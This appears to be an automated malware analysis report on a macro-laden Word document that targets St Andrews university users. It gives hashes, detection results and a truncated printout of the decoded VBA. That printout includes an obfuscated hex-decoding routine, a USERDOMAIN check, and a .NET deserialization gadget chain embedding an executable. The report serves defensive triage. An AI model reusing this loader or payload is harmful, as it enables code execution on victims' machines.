Office (OOXML) malware analysis — malicious · f94889590164cf9b

MALICIOUS

Office (OOXML)

75.7 KB Created: 2020-08-11 13:14:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-08-25

MD5: 9b2ae25f0e4644dcaf8e7bb49553dc2e SHA-1: 54ec768f0aa7c7791a2f3869d67e6facf11d7095 SHA-256: f94889590164cf9b6c60b6fb0abf43a7f35a5310f6ff5cffae19f9a52d08e262

200 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1505.003 Server Software Component: Exploit Public-Facing Application T1204.002 Malicious File: User Execution (Office Application)

The sample is an OOXML document containing VBA macros. The VBA script utilizes `CreateObject` and `Environ` calls, and attempts to deserialize a hex-encoded string into a .NET object. This payload appears to be designed for remote code execution, likely leveraging .NET deserialization vulnerabilities. The script's execution is conditional on the user's domain being 'ST-ANDREWS'.

Heuristics 7

ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.HexEncodedEXEHeader-9789587-1
VBA project inside OOXML medium 2 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
External hyperlinks (1) low OOXML_EXTERNAL_HYPERLINKS

Document contains 1 external hyperlink — clickable URLs are stored as external relationships. First target: https://www.st-andrews.ac.uk/coronavirus/
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- https://www.st-andrews.ac.uk/coronavirus/Document hyperlink

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	28045 bytes
SHA-256: `5d6fd95392bb1d7b9ec3ed3605149e93d9c5e3e3eb6365faad101c9d7b345b32`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 77 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "InkPicture1, 0, 0, MSINKAUTLib, InkPicture" Private Function prepareForm(hex) On Error Resume Next Dim DM, EL Set DM = CreateObject("Mi" & "crosoft.X" & "MLD" & "OM") Set EL = DM.createElement("t" & "mp") EL.DataType = "bi" & "n.h" & "ex" EL.Text = hex prepareForm = EL.NodeTypedValue End Function Function FillForm() On Error Resume Next If Environ("USERDOMAIN") <> "ST-ANDREWS" Then Exit Function End If Dim s As String s = "0001000000FFFFFFFF010000000000000004010000002253797374656D2E44656C656761746553657269616C697A6174696F6E486F6C646572030000000844656C65676174650774617267657430076D6574686F64300303033053797374656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E7472792253797374656D2E44656C65" s = s & "6761746553657269616C697A6174696F6E486F6C6465722F53797374656D2E5265666C656374696F6E2E4D656D626572496E666F53657269616C697A6174696F6E486F6C64657209020000000903000000090400000004020000003053797374656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E74727907000000047479706508" s = s & "617373656D626C79067461726765741274617267657454797065417373656D626C790E746172676574547970654E616D650A6D6574686F644E616D650D64656C6567617465456E747279010102010101033053797374656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E74727906050000002F53797374656D2E52756E74696D65" s = s & "2E52656D6F74696E672E4D6573736167696E672E48656164657248616E646C657206060000004B6D73636F726C69622C2056657273696F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D6237376135633536313933346530383906070000000774617267657430090600000006090000000F53797374656D2E44656C6567" s = s & "617465060A0000000D44796E616D6963496E766F6B650A04030000002253797374656D2E44656C656761746553657269616C697A6174696F6E486F6C646572030000000844656C65676174650774617267657430076D6574686F64300307033053797374656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E747279022F53797374" s = s & "656D2E5265666C656374696F6E2E4D656D626572496E666F53657269616C697A6174696F6E486F6C646572090B000000090C000000090D00000004040000002F53797374656D2E5265666C656374696F6E2E4D656D626572496E666F53657269616C697A6174696F6E486F6C64657206000000044E616D650C417373656D626C794E616D6509436C6173734E616D65095369676E6174" s = s & "7572650A4D656D626572547970651047656E65726963417267756D656E7473010101010003080D53797374656D2E547970655B5D090A0000000906000000090900000006110000002C53797374656D2E4F626A6563742044796E616D6963496E766F6B652853797374656D2E4F626A6563745B5D29080000000A010B0000000200000006120000002053797374656D2E586D6C2E5363" s = s & "68656D612E586D6C56616C756547657474657206130000004D53797374656D2E586D6C2C2056657273696F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D6237376135633536313933346530383906140000000774617267657430090600000006160000001A53797374656D2E5265666C656374696F6E2E417373656D62" s = s & "6C790617000000044C6F61640A0F0C00000000280000024D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000" s = s & "00504500004C010300D55FD3A30000000000000000E00022200B013000002000000006000000000000C23E00000020000000400000000000100020000000020000040000000000000004000000000000000080000000020000000000000300408500001000001000000000100000100000000000001000000000000000000000006D3E00004F00000000400000780300000000000000" s = s & "0000000000000000000000006000000C000000DC3D00003800000000000000000000000000000000000000000000000000000000000000000000 ... (truncated)
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	59392 bytes
SHA-256: `5b1ceeec8e6ef2f56d462a11e80e01def8dbcaf595bd50c9c216b0f9898f42fc`
Detection ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1 Obfuscation or payload: likely Carved artifact contains 78 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.